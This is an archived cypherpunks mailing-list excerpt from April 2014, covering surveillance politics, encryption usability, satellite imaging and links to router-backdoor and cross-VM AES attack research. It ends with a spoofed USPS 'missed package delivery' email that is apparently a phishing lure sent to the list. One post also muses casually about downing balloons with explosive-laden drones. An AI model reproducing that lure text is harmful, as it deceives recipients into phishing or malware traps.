WAwh3koU5gBukQpGry55fSr2bIFU9uFNRPp7VuGAEuQYZsu2FJZCrUKxwgL0aPFC pXtnJeOA4L6wWys+7yMR =JzoF -----END PGP SIGNATURE----- From davidroman96 at gmail.com Sat Apr 19 09:37:27 2014 From: davidroman96 at gmail.com (davidroman96) Date: Sat, 19 Apr 2014 18:37:27 +0200 Subject: Does a society of sheep deserve a government of wolves? In-Reply-To: <20140419134510.GA3833@sivokote.iziade.m$> References: <20140419134510.GA3833@sivokote.iziade.m$> Message-ID: <5352A647.5000302@gmail.com> If the wolf are eating sheeps, we need to fight against the wolf and help the sheeps. We need better encryption and anonymity to speak with freedom and fight against the ignorance and lies. The point is, how we can create new and better algorithms to protect the human rights?? A society of sheep don't deserve a government of wolves. El 19/04/14 15:45, Georgi Guninski escribió: > The question is: > > === > Does a society of sheep deserve a government of wolves? > === > > Some rants: > > Obama is protecting the NSA and is probably > claiming "I am elected by the sheep, so the > sheep are protecting the NSA". > > If it weren't Obama only the names will > change. > > The majority of sheep are economically > enslaved and/or brainwashed IMO. > > From cypher at cpunk.us Sun Apr 20 07:12:36 2014 From: cypher at cpunk.us (Cypher) Date: Sun, 20 Apr 2014 09:12:36 -0500 Subject: Does a society of sheep deserve a government of wolves? In-Reply-To: <1980426.dF0qtMjfnf@lap> References: <20140419134510.GA3833@sivokote.iziade.m$> <535305D4.3020407@cpunk.us> <1980426.dF0qtMjfnf@lap> Message-ID: <5353D5D4.2080107@cpunk.us> On 04/20/2014 03:39 AM, rysiek wrote: > Dnia sobota, 19 kwietnia 2014 18:25:08 Cypher pisze: >> On 04/19/2014 08:45 AM, Georgi Guninski wrote: >>> The question is: >>> >>> === Does a society of sheep deserve a government of wolves? >> >> If we, who know better, don't help the sheep raise out of their >> bondage then we become the wolves. > > Or get killed by the wolves, so that we can't help the sheep > anymore. That is a better fate than joining the feeding frenzy. From hettinga at gmail.com Sun Apr 20 06:55:13 2014 From: hettinga at gmail.com (Robert Hettinga) Date: Sun, 20 Apr 2014 09:55:13 -0400 Subject: [Cryptography] Inevitable Security Critiques, Promises and Lemons In-Reply-To: References: Message-ID: On Apr 19, 2014, at 10:07 AM, John Young wrote: > Still hopeful Hettinga will plug these insider breaches of why marketing > lemonade is so lucratively persuasive to those who know better. And who > do not disclose here. I’ll endeavour to persevere… Cheers, RAH -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: Message signed with OpenPGP using GPGMail URL: From rysiek at hackerspace.pl Sun Apr 20 01:39:39 2014 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 20 Apr 2014 10:39:39 +0200 Subject: Does a society of sheep deserve a government of wolves? In-Reply-To: <535305D4.3020407@cpunk.us> References: <20140419134510.GA3833@sivokote.iziade.m$> <535305D4.3020407@cpunk.us> Message-ID: <1980426.dF0qtMjfnf@lap> Dnia sobota, 19 kwietnia 2014 18:25:08 Cypher pisze: > On 04/19/2014 08:45 AM, Georgi Guninski wrote: > > The question is: > > > > === Does a society of sheep deserve a government of wolves? > > If we, who know better, don't help the sheep raise out of their > bondage then we become the wolves. Or get killed by the wolves, so that we can't help the sheep anymore. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From guninski at guninski.com Sun Apr 20 03:34:38 2014 From: guninski at guninski.com (Georgi Guninski) Date: Sun, 20 Apr 2014 13:34:38 +0300 Subject: Does a society of sheep deserve a government of wolves? In-Reply-To: <1980426.dF0qtMjfnf@lap> References: <20140419134510.GA3833@sivokote.iziade.m$> <535305D4.3020407@cpunk.us> <1980426.dF0qtMjfnf@lap> Message-ID: <20140420103438.GA2557@sivokote.iziade.m$> On Sun, Apr 20, 2014 at 10:39:39AM +0200, rysiek wrote: > Dnia sobota, 19 kwietnia 2014 18:25:08 Cypher pisze: > > On 04/19/2014 08:45 AM, Georgi Guninski wrote: > > > The question is: > > > > > > === Does a society of sheep deserve a government of wolves? > > > > If we, who know better, don't help the sheep raise out of their > > bondage then we become the wolves. > > Or get killed by the wolves, so that we can't help the sheep anymore. > > -- > Pozdr > rysiek Happy Easter. In Bulgarian: Христос Возкресе! From coderman at gmail.com Sun Apr 20 17:05:59 2014 From: coderman at gmail.com (coderman) Date: Sun, 20 Apr 2014 17:05:59 -0700 Subject: the Great Filter of private communication Message-ID: we have the maths! we have the technology! ... yet actual robust, private communications remain elusive. where the "Great Filter" thwarting our privacy codes? is it usability; anything more than invisibly automatic a failure? is it cost; anything more than zero too much to bear in the market? is it correctness; anything less than a single mode always secure, broken? perhaps all of these above, each a requisite element of robustness, further compounding the difficulty of realizing an ideal. From rysiek at hackerspace.pl Sun Apr 20 08:38:08 2014 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 20 Apr 2014 17:38:08 +0200 Subject: Does a society of sheep deserve a government of wolves? In-Reply-To: <5353D5D4.2080107@cpunk.us> References: <20140419134510.GA3833@sivokote.iziade.m$> <1980426.dF0qtMjfnf@lap> <5353D5D4.2080107@cpunk.us> Message-ID: <10925020.WpicNprW44@lap> Dnia niedziela, 20 kwietnia 2014 09:12:36 Cypher pisze: > On 04/20/2014 03:39 AM, rysiek wrote: > > Dnia sobota, 19 kwietnia 2014 18:25:08 Cypher pisze: > >> On 04/19/2014 08:45 AM, Georgi Guninski wrote: > >>> The question is: > >>> > >>> === Does a society of sheep deserve a government of wolves? > >> > >> If we, who know better, don't help the sheep raise out of their > >> bondage then we become the wolves. > > > > Or get killed by the wolves, so that we can't help the sheep > > anymore. > > That is a better fate than joining the feeding frenzy. Still, I think we can put up a fight and try to do something about the wolves. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From coderman at gmail.com Sun Apr 20 21:36:12 2014 From: coderman at gmail.com (coderman) Date: Sun, 20 Apr 2014 21:36:12 -0700 Subject: [liberationtech] Programming language for anonymity network In-Reply-To: References: <5350E1BD.5010304@mpi-sws.org> Message-ID: On Fri, Apr 18, 2014 at 8:25 PM, coderman wrote: > ... the criteria:... >> 1) Familiarity: ... >> 2) Maturity: ... >> 3) Language security: ... >> 4) Security of runtime / tool chain:.. > > > use modern C++ with testing discipline. also relevant: https://chriskohlhepp.wordpress.com/convergence-of-modern-cplusplus-and-lisp/ which gets kudos for also mentioning the benefits of modern C++ in respect to unit tests. to summarize the goals for your C++ implementation: - reads with clarity like a high level language - performs with efficiency like a low level language - tests with coverage across whole codebase regardless of language. full disclosure: i am a completely not biased party in this declaration of absolute truth. *cough* best regards, From coderman at gmail.com Sun Apr 20 22:43:48 2014 From: coderman at gmail.com (coderman) Date: Sun, 20 Apr 2014 22:43:48 -0700 Subject: NSA good guys In-Reply-To: <20140421044425.CE0C42280C9@palinka.tinho.net> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140421044425.CE0C42280C9@palinka.tinho.net> Message-ID: On Sun, Apr 20, 2014 at 9:44 PM, wrote: > ... > perhaps you would prefer this > > http://www.bbc.com/news/blogs-news-from-elsewhere-27067012 i wear my 'eggar[0] suit in public. or did, until it became made known unto me that such disguises are socially inappropriate. perhaps a better idea is to go in public as a celebrity, thereby confounding the automated identification systems while improving the odds of better service from others. ;) best regards, 0. donning the skin of an earth human as camouflage - "Wearing an Edgar suit" http://filmschoolrejects.com/features/meet-edgar-in-this-scene-we-love-from-men-in-black.php From sdw at lig.net Mon Apr 21 00:16:19 2014 From: sdw at lig.net (Stephen D. Williams) Date: Mon, 21 Apr 2014 00:16:19 -0700 Subject: Does a society of sheep deserve a government of wolves? In-Reply-To: <20140421025835.195d1c101054e63d426fa896@paranoici.org> References: <20140419134510.GA3833@sivokote.iziade.m$> <1980426.dF0qtMjfnf@lap> <5353D5D4.2080107@cpunk.us> <10925020.WpicNprW44@lap> <20140421025835.195d1c101054e63d426fa896@paranoici.org> Message-ID: <5354C5C3.3010001@lig.net> On 4/20/14, 10:58 PM, Luther Blissett wrote: > On Sun, 20 Apr 2014 17:38:08 +0200 > rysiek wrote: > >> Dnia niedziela, 20 kwietnia 2014 09:12:36 Cypher pisze: >>> On 04/20/2014 03:39 AM, rysiek wrote: >>>> Dnia sobota, 19 kwietnia 2014 18:25:08 Cypher pisze: >>>>> On 04/19/2014 08:45 AM, Georgi Guninski wrote: >>>>>> The question is: >>>>>> >>>>>> === Does a society of sheep deserve a government of wolves? >>>>> If we, who know better, don't help the sheep raise out of their >>>>> bondage then we become the wolves. >>>> Or get killed by the wolves, so that we can't help the sheep >>>> anymore. >>> That is a better fate than joining the feeding frenzy. >> Still, I think we can put up a fight and try to do something about the wolves. >> > We sure can do something, but there maybe some terribly failed attempts before we put some fire in the middle of the pack. > 1) Be the enlightened humanist humans holding the wolves at bay. It's great we can generate the most badass attack / defense military and police, but they have to have boundaries and limits. Compared to various historical precedents, they are effective and aren't terrible overall, but they do not live up to the ideals that are appropriate now. 2) Uplift the sheep. The elites are failing the sheep, which isn't good for anyone. We've left it to those who have the responsibility, but many of them are sheep too: shallow functionaries happy enough with the status quo and too scared to fail worse to tinker. Elites (of a certain range: educated, makers, hackers, thinkers, freethinkers) have the power to change the world. That includes some who are now considered with the wolves in various senses. A few smart people changed civil rights, etc. Don't assume that everyone who is part of the system agrees with it. People are far more pragmatic than that. Which generally includes not breaking laws, but can include transparency, dialog, and moving toward improvement. The greater population have the power to swarm the wolves in various ways, if only they were knowledgeable, motivated, enabled, and led. Some progress has been made, and there are plenty of chinks visible now. The trick is informing, directing, and/or leading that potential energy through a transformative path that is not more destructive than what you're trying to cure. Sometimes it means letting groups make fools of themselves long enough for everyone to get tired and aware enough to shun them for long periods after. The end result of the "moral majority" minority and religious / public power grab and related surge for social freedom/sexual oppression was: free and open porn, negating of nearly all sexual blue laws, momentum for same-sex civil rights, nearly complete change of attitudes, dissipation of religion-in-government and general defeat of religious fundamentalists, an educated liberal probably-atheist black president, etc. They spent money and time defeating themselves, permanently, and they don't even know why it happened. Sociopolitical judo. On the other hand, for a long time Rove et al were frequently successful reframing things with clever rebranding of terms: "death taxes" etc. What is the equivalent for the things you care about? What are the key embarrassing and enlightening missteps that would clarify the problem and solution for your average sheeple. If it could be proved that some agency knew about and used Heartbleed while knowingly exposing all of the worlds people and companies to compromise due to hoarding key information and inaction, that might qualify. sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4943 bytes Desc: not available URL: From sdw at lig.net Mon Apr 21 00:30:42 2014 From: sdw at lig.net (Stephen D. Williams) Date: Mon, 21 Apr 2014 00:30:42 -0700 Subject: the Great Filter of private communication In-Reply-To: References: Message-ID: <5354C922.5070708@lig.net> Probably people just need two email clients: One for non-secure email, another that only sends secure messages. They can both use imap for the same account. Bonus: spam might potentially have a hard time getting accepted as a secure sender, leaving secure email spam free. Alternately, do it on viewing / editing via plugins that are less invasive and more secure. There are several problems: Choosing an ID system: email address + key ID of some kind. Key exchange / trust system: Hierarchical (do you trust some or all CAs? Their signup policies?), web of trust (GPG or similar), personal signing, etc. Visibility and understanding: Current systems are annoying even for experts. No hope of a normal user looking at or understanding ID/cert/key trust situation. Make it specific and simple: CA is safe but could be coopted by TLA or mistakes, signup was weak (could have been a stolen credit card), password could have been stolen, mitm exposure, etc. Just draw the trust / exploit tree. Factor in multi-factor, alternate channel checking, etc. Ease of selecting, enabling, and using read/write interfaces. Solve the problems of control, time available, ability to save for later safely. Stephen On 4/20/14, 10:55 PM, Scott Blaydes wrote: > On Apr 20, 2014, at 7:05 PM, coderman wrote: > >> we have the maths! we have the technology! >> >> ... yet actual robust, private communications remain elusive. >> >> where the "Great Filter" thwarting our privacy codes? >> >> >> >> is it usability; anything more than invisibly automatic a failure? > Yes. People keep claiming that it is just too hard to encrypt email. There are plugins for all platforms. If you can’t send encrypted email, sending email in the first place is probably too difficult, just txt everyone on your fone. The smartfone has made for such stupid people that if it can’t be done in just a few keystrokes (content included) then it is too hard or tl;dr. > > Remember the old days when there wasn’t PPP and SLIP connections? Before broadband. When a conversation on IRC was enjoyable, the right amounts of humor and actual thought? And you knew not to ask for help in #unix on efnet. > >> is it cost; anything more than zero too much to bear in the market? >> > No, everyone can afford a smartfone now a days. > >> is it correctness; anything less than a single mode always secure, broken? > Life is full of levels of grey, and so is security. That password you use on new sites you don’t trust vs your gpg/pgp passphrase. The sheeple don’t have levels of grey with regards to security, either take it to their grave or everyone can see. > > Chatting with someone who was looking to start his own desktop Linux distro. I suggested an encrypted messaging platform over the security-hole-riddled platform he was using and he told me he had nothing to hide. I told him he wasn’t the kind of person who should be developing anything security related. > > Security takes effort that people are not will to expend. >> >> >> perhaps all of these above, each a requisite element of robustness, >> further compounding the difficulty of realizing an ideal. -- Stephen D. Williams sdw at lig.net stephendwilliams at gmail.com LinkedIn: http://sdw.st/in V:650-450-UNIX (8649) V:866.SDW.UNIX V:703.371.9362 F:703.995.0407 AIM:sdw Skype:StephenDWilliams Yahoo:sdwlignet Resume: http://sdw.st/gres Personal: http://sdw.st facebook.com/sdwlig twitter.com/scienteer -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5075 bytes Desc: not available URL: From dan at geer.org Sun Apr 20 21:44:25 2014 From: dan at geer.org (dan at geer.org) Date: Mon, 21 Apr 2014 00:44:25 -0400 Subject: NSA good guys In-Reply-To: Your message of "Thu, 17 Apr 2014 19:02:11 -0300." <53504f61.04693a0a.602f.5a7e@mx.google.com> Message-ID: <20140421044425.CE0C42280C9@palinka.tinho.net> > http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg perhaps you would prefer this http://www.bbc.com/news/blogs-news-from-elsewhere-27067012 --dan From scott at sbce.org Sun Apr 20 22:55:43 2014 From: scott at sbce.org (Scott Blaydes) Date: Mon, 21 Apr 2014 00:55:43 -0500 Subject: the Great Filter of private communication In-Reply-To: References: Message-ID: On Apr 20, 2014, at 7:05 PM, coderman wrote: > we have the maths! we have the technology! > > ... yet actual robust, private communications remain elusive. > > where the "Great Filter" thwarting our privacy codes? > > > > is it usability; anything more than invisibly automatic a failure? Yes. People keep claiming that it is just too hard to encrypt email. There are plugins for all platforms. If you can’t send encrypted email, sending email in the first place is probably too difficult, just txt everyone on your fone. The smartfone has made for such stupid people that if it can’t be done in just a few keystrokes (content included) then it is too hard or tl;dr. Remember the old days when there wasn’t PPP and SLIP connections? Before broadband. When a conversation on IRC was enjoyable, the right amounts of humor and actual thought? And you knew not to ask for help in #unix on efnet. > > is it cost; anything more than zero too much to bear in the market? > No, everyone can afford a smartfone now a days. > is it correctness; anything less than a single mode always secure, broken? Life is full of levels of grey, and so is security. That password you use on new sites you don’t trust vs your gpg/pgp passphrase. The sheeple don’t have levels of grey with regards to security, either take it to their grave or everyone can see. Chatting with someone who was looking to start his own desktop Linux distro. I suggested an encrypted messaging platform over the security-hole-riddled platform he was using and he told me he had nothing to hide. I told him he wasn’t the kind of person who should be developing anything security related. Security takes effort that people are not will to expend. > > > > perhaps all of these above, each a requisite element of robustness, > further compounding the difficulty of realizing an ideal. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 842 bytes Desc: Message signed with OpenPGP using GPGMail URL: From lblissett at paranoici.org Sun Apr 20 22:58:35 2014 From: lblissett at paranoici.org (Luther Blissett) Date: Mon, 21 Apr 2014 02:58:35 -0300 Subject: Does a society of sheep deserve a government of wolves? In-Reply-To: <10925020.WpicNprW44@lap> References: <20140419134510.GA3833@sivokote.iziade.m$> <1980426.dF0qtMjfnf@lap> <5353D5D4.2080107@cpunk.us> <10925020.WpicNprW44@lap> Message-ID: <20140421025835.195d1c101054e63d426fa896@paranoici.org> On Sun, 20 Apr 2014 17:38:08 +0200 rysiek wrote: > Dnia niedziela, 20 kwietnia 2014 09:12:36 Cypher pisze: > > On 04/20/2014 03:39 AM, rysiek wrote: > > > Dnia sobota, 19 kwietnia 2014 18:25:08 Cypher pisze: > > >> On 04/19/2014 08:45 AM, Georgi Guninski wrote: > > >>> The question is: > > >>> > > >>> === Does a society of sheep deserve a government of wolves? > > >> > > >> If we, who know better, don't help the sheep raise out of their > > >> bondage then we become the wolves. > > > > > > Or get killed by the wolves, so that we can't help the sheep > > > anymore. > > > > That is a better fate than joining the feeding frenzy. > > Still, I think we can put up a fight and try to do something about the wolves. > We sure can do something, but there maybe some terribly failed attempts before we put some fire in the middle of the pack. -- Luther Blissett From jamesdbell9 at yahoo.com Mon Apr 21 12:52:32 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Mon, 21 Apr 2014 12:52:32 -0700 (PDT) Subject: Fw: NSA good guys In-Reply-To: <1397934947.17049.YahooMailNeo@web126202.mail.ne1.yahoo.com> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> <20140419182746.GC2173@nl.grid.coop> <1397934947.17049.YahooMailNeo@web126202.mail.ne1.yahoo.com> Message-ID: <1398109952.19376.YahooMailNeo@web126201.mail.ne1.yahoo.com> From: jim bell To: Troy Benjegerdes   > [I didn't get a bounce off of CP the first time] >Izvestia'.)   An approximation I once heard is that a lens or mirror of about 4.5 inch in diameter can resolve an >>angle of one arc-second.  A mirror of the size of the Hubble Space Telescope (which I assume approximates >>that of the typical spy satellite today) is about 20x larger, so the resolution should be 20x better, or 1/20 arc->>second.  That's 1/(57 degrees per radian)(3600arcseconds per degree)(20) = 1/4,100,000 radian.  From an >>altitude of 500 kilometers, that's about 1/8 of a meter, or 120 millimeter.  Maybe that's a pixel-pair, but it's far >>too large to resolve the text on a newspaper.   >>> The best prospect to improve on this resolution would be to use a 'multiple-mirror-telescope' technology. > >Light-gathering capability isn't important in this application; high resolution is.  Making a spy-telescope out of a >>few different mirrors, held precisely many meters apart, could conceivable achieve resolutions substantially >>greater than this. >>    Jim Bell >Such a mirror array would at some point reflect enough light at odd angles to be visible with the >naked eye. >I find it more likely that multiple-mirror-telescope tech would be implemented with a swarm of small >satellites and extremely precise location tracking and a lot of signal processing later on. I sure find that difficult to imagine!  Particularly because the assemblage would presumably be flying at about 500 kilometers altitude, and would therefore be buffeted by extremely-small-but-significant orbital winds.  In addition, the amount of information that would have to be interchanged (phase and amplitude, in TWO dimensions!) of an entire field of view would be phenomenal.   What I suspect the US military would really like to see is a spy satellite at geosync altitude (22,000 miles) with an apparent aperture of perhaps 150 meters, so that it has roughly the same resolution on the ground as existing fast-orbital spy satellites.  (orbital period circa 90 minutes or so).               Jim Bell Curiously, I just saw this article:   (http://news.yahoo.com/us-military-developing-foldable-space-telescope-video-images-110058353.html) The United States military's advanced research arm is working on a foldable space telescope that could image Earth in high resolution at a relatively low cost. The Defense Advanced Research Projects Agency (DARPA) says the telescope design — known as theMembrane Optical Imager for Real-Time Exploitation, or MOIRE — would be of great use in geosynchronous Earth orbit, the spot 22,000 miles (35,000 kilometers) up where most telecommunications satellites reside. "Membrane optics could enable us to fit much larger, higher-resolution telescopes in smaller and lighter packages," Lt. Col. Larry Gunn, MOIRE program manager, said in a statement. [Giant Space Telescopes of the Future (Infographic)] "In that respect, we’re ‘breaking the glass ceiling’ that traditional materials impose on optics design," Gunn added. "We’re hoping our research could also help greatly reduce overall costs and enable more timely deployment using smaller, less expensive launch vehicles." MOIRE is now in Phase 2 of development since work began in 2010. When this phase is completed, a 16-foot (5 meters) prototype of the telescope's mirror should be completed for ground testing. No space missions have been set for MOIRE yet, DARPA officials said. There are both advantages and disadvantages to the MOIRE design. The membrane is not as efficient as the usual glass, but it is lighter — which allows prime contractor Ball Aerospace & Technologies Corp. to make larger lenses to increase the telescope's efficiency. DARPA estimates that a membrane system should weigh 86 percent less than a more traditional system of the same resolution and mass.w gallery Most telescopes either reflect light (using mirrors) or refract it (using lenses), but MOIRE's behaves differently. Each membrane will instead diffract light using a piece of equipment known as a Fresnel lens. "It is etched with circular concentric grooves like microscopically thin tree rings, with the grooves hundreds of microns across at the center down to only 4 microns at the outside edge," DARPA officials said in a statement. "The diffractive pattern focuses light on a sensor that the satellite translates into an image." If the design ever reaches orbit, DARPA envisions the membrane stretching to 66 feet (20 meters) in diameter — about eight times the diameter of the Hubble Space Telescope and more than three times bigger than the mirror for NASA's huge James Webb Space Telescope, which is scheduled to launch in 2018. The membranes would ride to space as "petals" packed into a tight package about 20 feet (6 m) wide, small enough to fit on a rocket. These petals would then unfurl in orbit, and provide an estimated resolution of 3.3 feet (1 m). Follow Elizabeth Howell Elizabeth Howell, or Space.com @Spacedotcom. We're also on Facebook and Google+. Originally published on Space.com. =============== -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 12149 bytes Desc: not available URL: From juan.g71 at gmail.com Mon Apr 21 11:01:58 2014 From: juan.g71 at gmail.com (Juan) Date: Mon, 21 Apr 2014 15:01:58 -0300 Subject: NSA good guys In-Reply-To: <20140421044425.CE0C42280C9@palinka.tinho.net> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140421044425.CE0C42280C9@palinka.tinho.net> Message-ID: <53558739.89bc340a.1b27.4039@mx.google.com> On Mon, 21 Apr 2014 00:44:25 -0400 dan at geer.org wrote: > > > http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg > > perhaps you would prefer this > > http://www.bbc.com/news/blogs-news-from-elsewhere-27067012 Ha! That's colorfull. > --dan > From tpb-crypto at laposte.net Mon Apr 21 07:43:27 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Mon, 21 Apr 2014 16:43:27 +0200 Subject: Fw: NSA good guys In-Reply-To: <1397934947.17049.YahooMailNeo@web126202.mail.ne1.yahoo.com> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> <20140419182746.GC2173@nl.grid.coop> <1397934947.17049.YahooMailNeo@web126202.mail.ne1.yahoo.com> Message-ID: <1341207525.14841.1398091407602.JavaMail.www@wwinf8311> > Message du 19/04/14 21:49 > De : "jim bell" > From: Troy Benjegerdes > To: jim bell   > > > [I didn't get a bounce off of CP the first time] > >Izvestia'.)   An approximation I once heard is that a lens or mirror of about 4.5 inch in diameter can resolve an >>angle of one arc-second.  A mirror of the size of the Hubble Space Telescope (which I assume approximates >>that of the typical spy satellite today) is about 20x larger, so the resolution should be 20x better, or 1/20 arc->>second.  That's 1/(57 degrees per radian)(3600arcseconds per degree)(20) = 1/4,100,000 radian.  From an >>altitude of 500 kilometers, that's about 1/8 of a meter, or 120 millimeter.  Maybe that's a pixel-pair, but it's far >>too large to resolve the text on a newspaper.   > >>> The best prospect to improve on this resolution would be to use a 'multiple-mirror-telescope' technology. > >Light-gathering capability isn't important in this application; high resolution is.  Making a spy-telescope out of a >>few different mirrors, held precisely many meters apart, could conceivable achieve resolutions substantially >>greater than this. > >>    Jim Bell > >Such a mirror array would at some point reflect enough light at odd angles to be visible with the > >naked eye. > >I find it more likely that multiple-mirror-telescope tech would be implemented with a swarm of small > >satellites and extremely precise location tracking and a lot of signal processing later on. > > I sure find that difficult to imagine!  Particularly because the assemblage would presumably be flying at about 500 kilometers altitude, and would therefore be buffeted by extremely-small-but-significant orbital winds.  In addition, the amount of information that would have to be interchanged (phase and amplitude, in TWO dimensions!) of an entire field of view would be phenomenal.   > What I suspect the US military would really like to see is a spy satellite at geosync altitude (22,000 miles) with an apparent aperture of perhaps 150 meters, so that it has roughly the same resolution on the ground as existing fast-orbital spy satellites.  (orbital period circa 90 minutes or so).  >              Jim Bell Balloons, that's what the military uses for high resolution imagery. And they are so good to stay aloft that not even with a .50 machine gun you would be able to down it. The only way to do that is to fly a drone nearby carrying some pounds of dynamite and fire it off. From tpb-crypto at laposte.net Mon Apr 21 08:18:39 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Mon, 21 Apr 2014 17:18:39 +0200 Subject: Does a society of sheep deserve a government of wolves? In-Reply-To: <10925020.WpicNprW44@lap> References: <20140419134510.GA3833@sivokote.iziade.m$> <1980426.dF0qtMjfnf@lap> <5353D5D4.2080107@cpunk.us> <10925020.WpicNprW44@lap> Message-ID: <111681235.16454.1398093519841.JavaMail.www@wwinf8311> > Message du 20/04/14 18:12 > De : "rysiek" > Dnia niedziela, 20 kwietnia 2014 09:12:36 Cypher pisze: > > On 04/20/2014 03:39 AM, rysiek wrote: > > > Dnia sobota, 19 kwietnia 2014 18:25:08 Cypher pisze: > > >> On 04/19/2014 08:45 AM, Georgi Guninski wrote: > > >>> The question is: > > >>> > > >>> === Does a society of sheep deserve a government of wolves? > > >> > > >> If we, who know better, don't help the sheep raise out of their > > >> bondage then we become the wolves. > > > > > > Or get killed by the wolves, so that we can't help the sheep > > > anymore. > > > > That is a better fate than joining the feeding frenzy. > > Still, I think we can put up a fight and try to do something about the wolves. > Castrating the wolves would be a good start. From grarpamp at gmail.com Mon Apr 21 19:45:18 2014 From: grarpamp at gmail.com (grarpamp) Date: Mon, 21 Apr 2014 22:45:18 -0400 Subject: HW backdoors Message-ID: In your routers, in your cpu's, in your firmwares, in your shorts... magic packets are everywhere. http://www.synacktiv.com/ressources/TCP32764_backdoor_again.pdf From griffin at cryptolab.net Tue Apr 22 10:33:35 2014 From: griffin at cryptolab.net (Griffin Boyce) Date: Tue, 22 Apr 2014 13:33:35 -0400 Subject: Fine grain Cross-VM Attacks on Xen and VMware (AES) Message-ID: <4d480631ba7505e3c43b7bbe66c2e5e7@cryptolab.net> 'AES in a number popular cryptographic libraries including OpenSSL, PolarSSL and Libgcrypt are vulnerable to Bernstein’s correlation attack when run in Xen and VMware virtual machines, the most popular VMs used by cloud service providers.' Abstract: http://eprint.iacr.org/2014/248 Paper: http://eprint.iacr.org/2014/248.pdf So in a nutshell, if you want to steal a website's private keys, you can get an account on their hosting provider and at least have a shot at getting on the same physical server ;-) ~Griffin From grarpamp at gmail.com Tue Apr 22 12:29:26 2014 From: grarpamp at gmail.com (grarpamp) Date: Tue, 22 Apr 2014 15:29:26 -0400 Subject: Fw: NSA good guys In-Reply-To: <20140419182746.GC2173@nl.grid.coop> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> <20140419182746.GC2173@nl.grid.coop> Message-ID: > Such a mirror array would at some point reflect enough light at odd angles to be visible with the > naked eye. Moot, the minute you drop some sat into orbit everyone knows it's there even if they don't yet know what it does. Some speculate at least the US uses angled optical/radar shields to hide the bulk of some crafts from ground/orbital view. Sounds like a lot of game for that, especially when aerospace industry spies could provide the same general infos. > I find it more likely that multiple-mirror-telescope tech would be implemented with a swarm of small > satellites and extremely precise location tracking and a lot of signal processing later on. Seems really difficult to fly and calibrate. ie: would certainly need better than gps timing onboard each. Maybe 1km pyramid of four could range each other well enough, no idea. As Jim referenced, membranes and cheap ridgid multi mirror systems may be better. Remember Hubble was scrap when launched, but given a reference image (or in its case, a grind pattern) corrected/adaptive optics fixed it into gold. From grarpamp at gmail.com Tue Apr 22 13:00:38 2014 From: grarpamp at gmail.com (grarpamp) Date: Tue, 22 Apr 2014 16:00:38 -0400 Subject: Fw: NSA good guys In-Reply-To: <1341207525.14841.1398091407602.JavaMail.www@wwinf8311> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> <20140419182746.GC2173@nl.grid.coop> <1397934947.17049.YahooMailNeo@web126202.mail.ne1.yahoo.com> <1341207525.14841.1398091407602.JavaMail.www@wwinf8311> Message-ID: > Balloons, that's what the military uses for high resolution imagery. And they are so good to stay aloft that not even with a .50 machine gun you would be able to down it. The only way to do that is to fly a drone nearby carrying some pounds of dynamite and fire it off. Blimps sure... restricted dynamite?, just sit on top and dump burning petrol, drill, cut, etc. Unless you get balloons that way on launch (high climb rate is hard to target), high altitude (weather/spy) balloons are not reachable by anything less than missiles. Small holes in anything will prohibit reaching station and/or limit hold time. Drones are just as good for most things, that's why everyone has them now, even you. From blibbet at gmail.com Tue Apr 22 16:53:23 2014 From: blibbet at gmail.com (Blibbet) Date: Tue, 22 Apr 2014 16:53:23 -0700 Subject: Novena needs crowdfunding help Message-ID: <535700F3.4050508@gmail.com> They're 70% there, Bunnie needs help with rest. http://www.bunniestudios.com/blog/?p=3750 http://www.crowdsupply.com/kosagi/novena-open-laptop "$178,790 raised of $250,000 goal" From service-notification at usps.gov Tue Apr 22 10:14:41 2014 From: service-notification at usps.gov (=?koi8-r?B?k1VTUFMgRXhwcmVzcyBTZXJ2aWNlcyI=?=) Date: Tue, 22 Apr 2014 17:14:41 +0000 Subject: =?koi8-r?B?VVNQUyCWIE1pc3NlZCBwYWNrYWdlIGRlbGl2ZXJ5?= Message-ID: We attempted to deliver your item at 09:30 am on Apr 22th, 2014. The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically sent. You may arrange redelivery by visiting the link below or pick up the item at the U.S. Post Office indicated on the receipt. If the package is not scheduled for redelivery or picked up within 48 hours, it will be returned to the sender. Label/Receipt Number: US2716808EU Class: Package Services Service(s): Delivery Confirmation Status: eNotification sent Print this label to get this package at our post office. Thank you, © 2014 Copyright© 2013 USPS. All Rights Reserved. *** This is an automatically generated email, please do not reply *** 